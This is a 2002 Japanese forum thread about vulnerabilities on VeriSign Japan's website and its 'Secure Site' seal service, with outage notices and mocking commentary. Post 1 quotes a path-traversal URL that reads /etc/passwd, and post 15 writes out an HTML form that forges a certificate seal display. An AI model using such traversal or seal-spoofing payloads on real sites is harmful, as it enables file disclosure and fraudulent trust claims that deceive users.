ベリサインの Secure Site シールが404 Not Found!
1 :名無しさん@お腹いっぱい。:
http://headlines.yahoo.co.jp/hl?a=20020307-00000032-vgb-sci
日本ベリサインのWebに重大な問題が! ファイルが丸見えに(Scan)
大手認証ベンダである日本ベリサインのWebサイトに、重大な問題点が発見された。今回発見された問題点は、以下のようなURLへのアクセスが可能であり、ファイルが閲覧できてしまうというもの。
ttps://www.verisign.co.jp/cgi-bin/haydn.exe?VHTML_FILE=../../../../../../etc/passwd
しかし、幸いなことに編集部より同社へと通告してから、わずか20分程度で同社より返事をもらうことができた。それによると、「問題を認識し、既にサーバを停止しした。
まだ停止中だなゴルァ
ジャパネ銀行の下んとこのシール、クリックしてみれ
http://www.japannetbank.co.jp/
404 - File not found
お探しのファイルは、このサーバ内にありません。
リンク切れの場合、弊社ウェブマスターまで、ご連絡下さい。
日本ベリサイン株式会社
オンラインマーケティング担当
日本ベリサインのWebに重大な問題が! ファイルが丸見えに(Scan)
大手認証ベンダである日本ベリサインのWebサイトに、重大な問題点が発見された。今回発見された問題点は、以下のようなURLへのアクセスが可能であり、ファイルが閲覧できてしまうというもの。
ttps://www.verisign.co.jp/cgi-bin/haydn.exe?VHTML_FILE=../../../../../../etc/passwd
しかし、幸いなことに編集部より同社へと通告してから、わずか20分程度で同社より返事をもらうことができた。それによると、「問題を認識し、既にサーバを停止しした。
まだ停止中だなゴルァ
ジャパネ銀行の下んとこのシール、クリックしてみれ
http://www.japannetbank.co.jp/
404 - File not found
お探しのファイルは、このサーバ内にありません。
リンク切れの場合、弊社ウェブマスターまで、ご連絡下さい。
日本ベリサイン株式会社
オンラインマーケティング担当
|
|
|
2 :名無しさん@お腹いっぱい。:02/03/08 02:49
なんか大変そうだな
3 :名無しさん@お腹いっぱい。:02/03/08 03:58
セキュリティが売りの会社なのに、こんな素人以下のシステムで
年間8万?か・・・・ボロい商売だ。
Yahooが対応の早さ云々言うのには、もっと呆れるが。
年間8万?か・・・・ボロい商売だ。
Yahooが対応の早さ云々言うのには、もっと呆れるが。
4 :名無しさん@お腹いっぱい。:02/03/08 04:30
12万円では?
5 :404は解消した:02/03/08 13:11
「Secure Site シール」に関する情報提供サービス一時停止のお知らせ
現在、サーバ証明書の情報を提供するサービスを一時停止しております。
大変ご迷惑をおかけいたしますが、ご理解くださいますようお願い申し上げます。
なお、当該サーバのSSL通信の機能には全く影響はございません。
日本ベリサイン株式会社
現在、サーバ証明書の情報を提供するサービスを一時停止しております。
大変ご迷惑をおかけいたしますが、ご理解くださいますようお願い申し上げます。
なお、当該サーバのSSL通信の機能には全く影響はございません。
日本ベリサイン株式会社
6 :名無しさん@お腹いっぱい。:02/03/08 19:33
7 : :02/03/09 01:48
8 :名無しさん@お腹いっぱい。:02/03/09 01:51
うわ最悪。いま自社鯖で確認してきたけどまだ駄目か
9 : :02/03/09 01:53
10 :名無しさん@お腹いっぱい。:02/03/09 08:43
まだ修復してないな。
こんなのまともな技術者が一人徹夜するだけで作り直せるだろうに。
こんなのまともな技術者が一人徹夜するだけで作り直せるだろうに。
おお、たった今修復したようだ。すまソ。徹夜ごくろーさん
12 :名無しさん@お腹いっぱい。:02/03/09 11:06
13 :名無しさん@お腹いっぱい。:02/03/09 18:09
本問題に関連した当該サーバへのアクセスは、通報いただいた方以外からはな(略)
トピ主さんがハッカーじゃないの?!(笑)
でも詳しいですね。
トピ主さんがハッカーじゃないの?!(笑)
でも詳しいですね。
14 :バカボンマンセー:02/03/09 23:32
ベリサイン Secure Site に偽装の脆弱性 〜安心のマークが不安のマークに!〜(2002.3.9)
https://www.netsecurity.ne.jp/article/1/4279.html
このシールと認証を利用するには、日本ベリサイン社に申込み、認証を受けなければならないのであるが、存在しない web でもあたかも認証を受けた web であるかのように偽装することが可能であった。
簡単なHTMLファイルをひとつ作るだけでベリサイン社のwebで「Secure Site」であるという表示を行うことができたのである。
偽装のサンプル
http://www.vagabond.co.jp/top/image/verisign02.GIF
https://www.netsecurity.ne.jp/article/1/4279.html
このシールと認証を利用するには、日本ベリサイン社に申込み、認証を受けなければならないのであるが、存在しない web でもあたかも認証を受けた web であるかのように偽装することが可能であった。
簡単なHTMLファイルをひとつ作るだけでベリサイン社のwebで「Secure Site」であるという表示を行うことができたのである。
偽装のサンプル
http://www.vagabond.co.jp/top/image/verisign02.GIF
15 :たぶんこんな感じだったのだろう:02/03/09 23:41
<FORM NAME=form1 METHOD=POST ACTION="https://www.verisign.co.jp/cgi-bin/siteseal.exe" TARGET="_blank">
<INPUT type=hidden name="VHTML_FILE" value="../htmldocs/query/authCertDisplay.htm">
<INPUT type=hidden name="form_file" value="../fdf/authCertByIssuer.fdf">
<INPUT type=hidden name="VS_STATUS" value="Valid Valider! Validest!!">
<INPUT type=hidden name="VS_VALID_START" value="30-MAY-1999">
<INPUT type=hidden name="VS_VALID_END" value="31-DEC-2019">
<INPUT type=hidden name="VS_PRODUCT_NAME" value="Digital ID Class 99 - Affiliate Global Server AuthCenter">
<INPUT type=hidden name="VS_ORGANIZATION" value="pc.2ch.net">
<INPUT type=hidden name="VS_COMMON_NAME" value="PC.2CH.NET">
<INPUT type=hidden name="VS_SUBJECT_READABLE" value="Country = JP<BR>
State = Tokyo<BR>Locality = Kitaku<BR>
Organizational Unit = Terms of use at www.verisign.co.jp/RPA (c)00<BR>
Organizational Unit = Authenticated by VeriSign Japan K.K.<BR>
Organizational Unit = Member, VeriSign Trust Network<BR>
Organization = ネットワークセキュリティ@2ch掲示板<BR>
Organizational Unit = (・∀・)<BR>
Common Name = pc.2ch.net/sec/">
</FORM>
<A HREF="javascript:document.form1.submit()">
<IMG SRC="http://www.verisign.co.jp/images/siteseal/VeriSignSeal.gif"></A>
<INPUT type=hidden name="VHTML_FILE" value="../htmldocs/query/authCertDisplay.htm">
<INPUT type=hidden name="form_file" value="../fdf/authCertByIssuer.fdf">
<INPUT type=hidden name="VS_STATUS" value="Valid Valider! Validest!!">
<INPUT type=hidden name="VS_VALID_START" value="30-MAY-1999">
<INPUT type=hidden name="VS_VALID_END" value="31-DEC-2019">
<INPUT type=hidden name="VS_PRODUCT_NAME" value="Digital ID Class 99 - Affiliate Global Server AuthCenter">
<INPUT type=hidden name="VS_ORGANIZATION" value="pc.2ch.net">
<INPUT type=hidden name="VS_COMMON_NAME" value="PC.2CH.NET">
<INPUT type=hidden name="VS_SUBJECT_READABLE" value="Country = JP<BR>
State = Tokyo<BR>Locality = Kitaku<BR>
Organizational Unit = Terms of use at www.verisign.co.jp/RPA (c)00<BR>
Organizational Unit = Authenticated by VeriSign Japan K.K.<BR>
Organizational Unit = Member, VeriSign Trust Network<BR>
Organization = ネットワークセキュリティ@2ch掲示板<BR>
Organizational Unit = (・∀・)<BR>
Common Name = pc.2ch.net/sec/">
</FORM>
<A HREF="javascript:document.form1.submit()">
<IMG SRC="http://www.verisign.co.jp/images/siteseal/VeriSignSeal.gif"></A>
16 :名無しさん@お腹いっぱい。:02/03/10 00:27
ベリサイン、アホやな。まじで(呆)
http://www.verisign.co.jp/press/alert/security_alertert20020308.html
また、”haydn.exe”というのは、VHTML_FILE で選んだ HTML をテンプレートにして、データを差し込んで表示するCGIであると推測される。
っての読んで、漏れも怪しいと思てたーよ。
http://www.verisign.co.jp/press/alert/security_alertert20020308.html
また、”haydn.exe”というのは、VHTML_FILE で選んだ HTML をテンプレートにして、データを差し込んで表示するCGIであると推測される。
っての読んで、漏れも怪しいと思てたーよ。
17 :名無しさん@お腹いっぱい。:02/03/10 02:50
またまた停止中
https://www.verisign.co.jp/secure/Seal.cgi?7a2431dc74d37e58235cc2605c3044ca
http://www.verisign.co.jp/press/alert/security_announce20020309.html
本サービスを提供する弊社システムの一部に不具合が発見されたため、本サービスを一時停止しておりました。その後、サービスを再開しましたが、現在、再度停止しております。
https://www.verisign.co.jp/secure/Seal.cgi?7a2431dc74d37e58235cc2605c3044ca
http://www.verisign.co.jp/press/alert/security_announce20020309.html
本サービスを提供する弊社システムの一部に不具合が発見されたため、本サービスを一時停止しておりました。その後、サービスを再開しましたが、現在、再度停止しております。
18 : :02/03/10 02:59
19 :名無しさん@お腹いっぱい。:02/03/10 03:44
haydn.exe で検索すると VeriSign(R) OnSite(R) のマニュアルがヒットする
http://www.google.com/search?q=cache:e6TN-E8ukQcC:www.eurotrust.dk/manuals/Reference.pdf+haydn.exe
OnSite ってなに?
http://www.google.com/search?q=cache:e6TN-E8ukQcC:www.eurotrust.dk/manuals/Reference.pdf+haydn.exe
OnSite ってなに?
20 :名無しさん@お腹いっぱい。:02/03/10 04:10
なるほど。これがテンプレートね。
http://www.verisign.co.jp/query/srv_Xdisplay.html
http://www.verisign.co.jp/query/srv_Xdisplay.html
21 :名無しさん@お腹いっぱい。:02/03/11 05:24
ベリサインは素人の集まりか??
22 :名無しさん@お腹いっぱい。:02/03/11 09:38
age
23 :名無しさん@お腹いっぱい。:02/03/11 12:42
$$VS_COMMON_NAME$$ は、
VeriSign Secure Site です。
お互い顔の見えないインターネットで、個人情報、クレジットカード番号など大切な情報をECサイトに渡す時に気掛かりなのがウェブサイトの実在性とプライバシーです。
「今 僕が見ているホームページのURLは 本当に $$VS_COMMON_NAME$$ なの?」
「私のパスワードやプライバシーが、ネット上で盗み見されないか不安なんだけど…。」
あなたが訪れたウェブサイトと以下の情報を見比べてみてください。
サーバ名
( コモンネーム) $$VS_COMMON_NAME$$
ステータス $$VS_STATUS$$
有効期間(GMT) $$VS_VALID_START$$ - $$VS_VALID_END$$
証明書のクラス $$VS_PRODUCT_NAME$$
サブジェクト $$VS_SUBJECT_READABLE$$
上記の表で、あなたが訪れたウェブサイトとサーバ名(コモンネーム)が一致して、ステータスがValid(有効)となっていれば、ベリサイン・サーバID(ウェブサーバ用証明書)によって該当ページが認証されていることを確認できます。
VeriSign Secure Site です。
お互い顔の見えないインターネットで、個人情報、クレジットカード番号など大切な情報をECサイトに渡す時に気掛かりなのがウェブサイトの実在性とプライバシーです。
「今 僕が見ているホームページのURLは 本当に $$VS_COMMON_NAME$$ なの?」
「私のパスワードやプライバシーが、ネット上で盗み見されないか不安なんだけど…。」
あなたが訪れたウェブサイトと以下の情報を見比べてみてください。
サーバ名
( コモンネーム) $$VS_COMMON_NAME$$
ステータス $$VS_STATUS$$
有効期間(GMT) $$VS_VALID_START$$ - $$VS_VALID_END$$
証明書のクラス $$VS_PRODUCT_NAME$$
サブジェクト $$VS_SUBJECT_READABLE$$
上記の表で、あなたが訪れたウェブサイトとサーバ名(コモンネーム)が一致して、ステータスがValid(有効)となっていれば、ベリサイン・サーバID(ウェブサーバ用証明書)によって該当ページが認証されていることを確認できます。
24 :名無しさん@お腹いっぱい。:02/03/11 12:43
23はデリられた>>20のコピペ
25 :名無しさん@お腹いっぱい。:02/03/11 13:55
何やってんだろ。
素人の間では詳細と関係なしに
「べりサインは危ない」
っつー単純な言葉だけが一人歩きするぞ。
素人の間では詳細と関係なしに
「べりサインは危ない」
っつー単純な言葉だけが一人歩きするぞ。
|__||||||__
|@-@|
t H / < ピザお届けにあがりました〜
|@-@|
t H / < ピザお届けにあがりました〜
27 : :02/03/12 00:33
28 :名無しさん@お腹いっぱい。:02/03/12 19:32
29 :匿名:02/03/12 19:57
みなさんセキュリチーにお強い方々ですがいったい何者なのですか?!
30 :名無しさん@お腹いっぱい。:02/03/13 00:01
>>29
普通のスキルだよ。
普通のスキルだよ。
31 :28:02/03/13 00:43
32 :匿名:02/03/13 18:12
29の者です。
皆さんはどうしてこんなにベリサインのことをこき下ろすのですか?
ベリサインに入社したいのですか?
皆さんはどうしてこんなにベリサインのことをこき下ろすのですか?
ベリサインに入社したいのですか?
33 : :02/03/13 18:34
34 :28:02/03/13 18:45
35 :名無しさん@お腹いっぱい。:02/03/13 19:44
ネットワーク上を流れる情報が暗号化してあっても、ウェブサーバーがタコじゃ意味がないじゃないですか。
日本ベリサインはPKI屋さんだからサーバーのセキュリティーは関係ないってこと?
日本ベリサインはPKI屋さんだからサーバーのセキュリティーは関係ないってこと?
37 :名無しさん@お腹いっぱい。:02/03/13 21:58
> 鍵屋さんが戸締りできてなくってどうするのさ。
しかも、ニセの鍵を作れるマスターキーを保管している鍵やなんで、
戸締まりできてなかったってのは、かなりヤバイ。
しかも、ニセの鍵を作れるマスターキーを保管している鍵やなんで、
戸締まりできてなかったってのは、かなりヤバイ。
38 :名無しさん@お腹いっぱい。:02/03/13 22:02
39 :名無しさん@お腹いっぱい。:02/03/14 00:32
>>38
知ったか君はDKするよ
知ったか君はDKするよ
40 :匿名:02/03/14 09:15
>>28
結局、鍵やがスペアキーの保管場所に鍵をかけ忘れてたってことなのですか?
結局、鍵やがスペアキーの保管場所に鍵をかけ忘れてたってことなのですか?
41 :名無しさん@お腹いっぱい。:02/03/14 10:29
42 :匿名:02/03/14 13:09
>>1
治ってるだれかまた壊さないの?!
治ってるだれかまた壊さないの?!
43 :名無しさん@お腹いっぱい。:02/03/14 13:40
誰も壊してねーようぜぇ氏ね
44 :名無しさん@お腹いっぱい。:02/03/15 11:10
ベリサインのサイト、またアクセスできないみたいだが、俺だけか?
45 :28:02/03/15 15:03
46 :名無しさん@お腹いっぱい。:02/03/15 16:58
なんの対策もせずに再開したんだとよ。救いがたいね。
http://memo.st.ryukoku.ac.jp/archive/200203.month/3236.html
http://memo.st.ryukoku.ac.jp/archive/200203.month/3236.html
47 :28:
セキュアサイトシールサービス再開の説明文
ttp://www.verisign.co.jp/press/alert/security_announce20020313.html
リンク切られて直じゃないと見られなくなっちゃったね。
都合の悪い情報は隠蔽ですか。
こんな企業信用できないぜ。
ttp://www.verisign.co.jp/press/alert/security_announce20020313.html
リンク切られて直じゃないと見られなくなっちゃったね。
都合の悪い情報は隠蔽ですか。
こんな企業信用できないぜ。